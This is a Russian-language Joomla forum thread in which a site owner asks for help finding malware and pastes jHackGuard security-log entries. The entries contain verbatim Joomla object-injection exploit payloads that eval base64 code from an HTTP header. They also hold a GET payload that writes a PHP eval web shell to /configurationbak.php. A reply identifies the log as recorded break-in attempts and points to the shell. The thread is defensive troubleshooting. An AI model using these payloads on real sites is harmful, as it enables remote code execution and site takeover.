0 Пользователей и 1 Гость просматривают эту тему.
  • 3 Ответов
  • 1055 Просмотров
*

Kim_Soal

  • Новичок
  • 9
  • 0 / 0
Joomla 2.5, вирус
« : 05.08.2016, 02:37:35 »
Добрый день.
Пытаюсь обнаружить вирус на сайте (особо ничем не проявляет себя, но в результатах выдачи сайт помечен как с возможным заражением). Вебмастер прислал сообщения с ссылками на страницы, в которых ломаный контент, но данные ничем мне эти не помогли.. с них идет просто переадрес на главную страницу.

Скачал сайт с ftp на локал. Распаковал,  проверил avz и cureit - все число. Ссылок на сторонние ресурсы нигде нет.  Фреймов не нашел. По общей инфе что искать - прошелся. По "eval(base64" нашел только один файлик /logs/jhackguard-log.php - я так понимаю, это лог ошибок, и самого вируса там быть не может?

Несколько  фрагментов:
2016-06-10T07:40:19+00:00   CRITICAL   jhackguard   Changed POST value from:ububv}__vzgcqpzryo|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:71:"eval(base64_decode($_SERVER['HTTP_CNXVS']));JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}ðýýý to:



2016-07-20T01:57:37+00:00   CRITICAL   jhackguard   Changed POST value from:uktdc}__lyqfkcvdcb|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:82:"eval(base64_decode(str_rot13($_SERVER['HTTP_ESOCW'])));JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}ðýýý to:



2016-08-04T04:06:13+00:00   CRITICAL   jhackguard   Changed GET value from:     @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/configurationbak.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; to:    @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/configurationbak.php','PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';


Уже вторые сутки просматриваю в ручную, в php js не силен, крыша едет пока что
Если кто сможет ответить,  или помочь, + к карме Вам обеспечен, можно в виде хороших отзывов где-то
*

SmokerMan

  • Гуру
  • 5293
  • 720 / 26
Re: Joomla 2.5, вирус
« Ответ #1 : 05.08.2016, 02:48:55 »
а топик не судьба этой ветки прочитать?
то что просканировали антивирусами - это все до жопы
как минимум стоит пройтись айболитом, ну и немного разбираться в php, что бы вылечить сайт полностью
бесплатных консультаций тут увы больше не будет)
*

Kim_Soal

  • Новичок
  • 9
  • 0 / 0
Re: Joomla 2.5, вирус
« Ответ #2 : 05.08.2016, 02:54:30 »
да мне бы хотя бы ответ на этот вопрос...
"/logs/jhackguard-log.php - я так понимаю, это лог ошибок, и самого вируса там быть не может?
"
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Joomla 2.5, вирус
« Ответ #3 : 05.08.2016, 07:42:39 »
да мне бы хотя бы ответ на этот вопрос...
"/logs/jhackguard-log.php - я так понимаю, это лог ошибок, и самого вируса там быть не может?
"
Это лог попыток взлома.А кто ставил плагин jhackguard ?
И там же прямое указание на шелл в файле в корне сайта /configurationbak.php
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 881
Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 1076
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 2930
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 1733
Последний ответ 22.02.2022, 11:38:15
от AlexP750
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

Ответов: 5
Просмотров: 1362
Последний ответ 13.09.2021, 09:23:28
от Oleg+